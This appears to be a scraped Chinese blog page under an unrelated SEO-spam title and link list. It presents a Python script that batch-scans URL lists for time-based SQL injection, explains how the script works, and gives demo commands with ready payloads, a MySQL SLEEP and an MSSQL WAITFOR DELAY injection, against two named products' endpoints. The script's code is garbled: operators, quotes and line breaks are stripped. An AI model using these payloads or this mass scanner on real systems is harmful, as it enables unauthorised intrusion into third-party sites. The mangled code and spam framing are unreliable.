当前位置: 首页 > news >正文

做公司永久免费网站什么好wordpress宽屏插件

做公司永久免费网站什么好,wordpress宽屏插件,seo推广效果,安阳网络平台文章目录 前言批量检测sql延时注入工作原理脚本演示 前言 SQL延时注入是一种在Web应用程序中利用SQL注入漏洞的技术#xff0c;当传统的基于错误信息或数据回显的注入方法不可行时#xff0c;例如当Web应用进行了安全配置#xff0c;不显示任何错误信息或敏感数据时#x… 文章目录 前言批量检测sql延时注入工作原理脚本演示 前言 SQL延时注入是一种在Web应用程序中利用SQL注入漏洞的技术当传统的基于错误信息或数据回显的注入方法不可行时例如当Web应用进行了安全配置不显示任何错误信息或敏感数据时延时注入可以作为一种有效的攻击手段。 于是我想写个脚本来批量扫描岂不美滋滋 批量检测sql延时注入 #!/usr/bin/env python # -*- coding: utf-8 -*- import http.client import ssl import argparse import time from urllib.parse import urlparse from urllib.parse import urlencode# 定义控制台输出颜色代码 # 定义控制台输出颜色代码 RED \033[91m RESET \033[0mdef check_sql_delay_injection(url, path, payload, method):检查给定的URL是否存在SQL延迟注入漏洞。:param url: 目标URL:param path: 注入点:param payload: 测试负载:param method: 传参方式try:# 构造HTTP请求头headers {Content-Type: application/x-www-form-urlencoded,User-Agent: Mozilla/5.0}# 如果是GET请求将数据附加到URL后面if method.upper() GET:url1 url# 构造用于检测SQL注入漏洞的URL路径url pathurl ? payload # 注意这里使用?来追加参数# 解析URL获取协议、域名和路径parsed_url urlparse(url)# 根据URL协议创建HTTP或HTTPS连接if parsed_url.scheme https:# 忽略SSL证书验证conn http.client.HTTPSConnection(parsed_url.netloc, contextssl._create_unverified_context())else:conn http.client.HTTPConnection(parsed_url.netloc)# 记录请求开始时间start_time time.time()# 发送GET请求conn.request(GET, url, headersheaders)response conn.getresponse()# 记录请求结束时间elapsed_time time.time() - start_timeelse:url1 url# 解析URL获取协议、域名和路径parsed_url urlparse(url)body payload# 根据URL的协议选择HTTP或HTTPS连接conn http.client.HTTPSConnection(parsed_url.netloc, contextssl._create_unverified_context()) if parsed_url.scheme https else http.client.HTTPConnection(parsed_url.netloc)start_time time.time()# 发送POST请求conn.request(POST, path, bodybody, headersheaders)response conn.getresponse()# 记录请求结束时间elapsed_time time.time() - start_time# 如果响应时间在3到5秒之间可能存在延迟注入漏洞if 3 elapsed_time 6:print(f{RED}URL [{url1}{path}|0.0620] 可能存在SQL延时注入漏洞{RESET})else:print(fURL [{url1}{path}|0.0620] 不存在SQL延时注入漏洞)except Exception as e:print(fURL [{url1}{path}] 请求失败: {e})def main():程序主入口负责解析命令行参数并执行漏洞检查。# 创建命令行参数解析器parser argparse.ArgumentParser(description检测目标地址是否存在SQL延时注入漏洞)parser.add_argument(-u, --url, help指定目标地址)parser.add_argument(-f, --file, help指定包含目标地址的文本文件)parser.add_argument(-p, --path, default, help指定要请求的路径)parser.add_argument(-pl, --payload, default, help)parser.add_argument(-m, --method, defaultPOST, help请求方法GET或POST)# 解析命令行参数args parser.parse_args()# 如果指定了URL参数if args.url:# 确保URL以http或https开头if not args.url.startswith(http://) and not args.url.startswith(https://):args.url http:// args.url# 执行漏洞检查check_sql_delay_injection(args.url, args.path, args.payload, args.method)# 如果指定了文件参数elif args.file:# 打开文件并读取URL列表with open(args.file, r) as file:urls file.read().splitlines()# 遍历文件中的每个URL进行检查for url in urls:# 确保URL以http或https开头dataif not url.startswith(http://) and not url.startswith(https://):url http:// url# 执行漏洞检查check_sql_delay_injection(url, args.path, args.payload, args.method) # 程序入口 if __name__ __main__:main()工作原理 这个Python脚本是一个用于检测SQL延迟注入漏洞的工具。它通过发送HTTP请求到目标URL并根据响应时间来判断是否存在SQL延迟注入的可能性。以下是脚本的工作过程和原理的详细解释 导入模块脚本开始时导入了所需的模块包括http.client用于创建HTTP连接ssl用于处理HTTPS请求的SSL上下文argparse用于解析命令行参数time用于测量请求的响应时间以及urllib.parse中的urlparse和urlencode用于解析和编码URL。 定义颜色代码为了在控制台输出中使用颜色脚本定义了两个变量RED和RESET分别用于开始和结束红色文本的输出。 定义检测函数check_sql_delay_injection函数是脚本的核心它接收目标URL、注入点、测试负载和传参方式作为参数。函数内部首先构造HTTP请求头然后根据请求方法GET或POST来构造请求。 GET请求处理 如果请求方法是GET脚本会将注入点和测试负载附加到URL后面形成完整的请求URL。使用urlparse解析这个URL获取协议、域名和路径。根据URL的协议http或https创建相应的HTTP或HTTPS连接。发送GET请求并测量请求的响应时间。 POST请求处理 如果请求方法是POST脚本会将测试负载作为请求体并将注入点作为请求路径。与GET请求类似根据URL协议创建连接并发送POST请求。同样测量请求的响应时间。 判断延迟注入脚本通过比较响应时间是否在3到6秒之间来判断是否存在SQL延迟注入漏洞。如果是脚本会输出警告信息指出可能存在漏洞。 异常处理在尝试发送请求和接收响应的过程中如果发生任何异常脚本会捕获这些异常并输出错误信息。 命令行参数解析main函数负责解析命令行参数。用户可以通过-u/--url指定单个目标URL或者通过-f/--file指定包含多个URL的文件。用户还可以指定请求路径-p/--path、测试负载-pl/--payload和请求方法-m/--method。 执行检测根据用户提供的参数脚本会遍历每个URL并调用check_sql_delay_injection函数来执行检测。 程序入口脚本的标准入口是if __name__ __main__部分它调用main函数来启动程序。 这个脚本的原理基于SQL延迟注入漏洞的一个特点通过构造特殊的SQL语句使得数据库在执行时故意延迟从而推断出某些信息。通过测量HTTP请求的响应时间脚本尝试检测这种延迟。如果响应时间异常就可能表明存在SQL延迟注入漏洞。 脚本演示 测试用例129网课交单平台epay.phpSQL注入漏洞 测试命令 python .\sqltime.py -f .\url-post.txt -p /epay/epay.php -pl out_trade_no AND (SELECT 8078 FROM(SELECT(SLEEP(3)))eEcA) AND aEmCaEmC -m POST测试用例2飞企互联treeXml.jspSQL注入 测试命令 python .\sqltime.py -f .\url-get.txt -p /sys/treeXml.js%70 -pl menuName1;WAITFORDELAY0:0:5--typefunction -m GET当人们做不到一些事情的时候他们会对你说你也同样不能。
http://www.hkea.cn/news/14497525/

相关文章:

  • 网站项目建设目标网络结构分几层
  • 网站被禁止访问怎么打开wordpress 壁纸模板
  • 杏林建设网站莱芜建设银行网站
  • 网站调用flashwordpress 主页html
  • 杭州学网站建设建卖手机网站
  • php网站开发教案写代码做网站需要多好的cpu
  • 电商网站建设特色seo方案
  • 美容网站模版负面信息网站
  • 兰州网站在哪备案第三方开放平台有哪些
  • 帮客户做网站的公司深圳网站制作 论坛
  • 免费个人建站空间石家庄热搜
  • 漯河网站建设兼职做网站需要什么人
  • 沧浪企业建设网站价格网站建设开发原代码归属
  • 国际贸易网站建设WordPress做app下载
  • 安陆市网站响应式网站的原理
  • 内容分享网站设计长沙logo设计公司哪家好些
  • 网站销售系统怎么做西安关键词优化服务
  • 汽车网站建设公司网站建设及安全管理
  • 蜀都网站建设舜王上海人力资源网官方网
  • 黑豹站群系统建做网站
  • 网站建设 国际 深圳wordpress代刷网主题
  • 铜仁做网站电力建设集团网站
  • 网站建设和管理制度网站开发者工具post
  • 别人帮做的网站到期续费深圳网站建设公司好
  • php做网站的分站网站刷流量会怎么样
  • 本地建设网站怎么查看后台账号移动互联网开发选题
  • 网站建设管理分工的说明今天的新闻联播内容
  • 网站列表页内容重庆建工集团有限公司官网
  • 建网站流程 知乎怎么做网站的域名解析
  • 建设网站的基本步骤可以做淘宝客的网站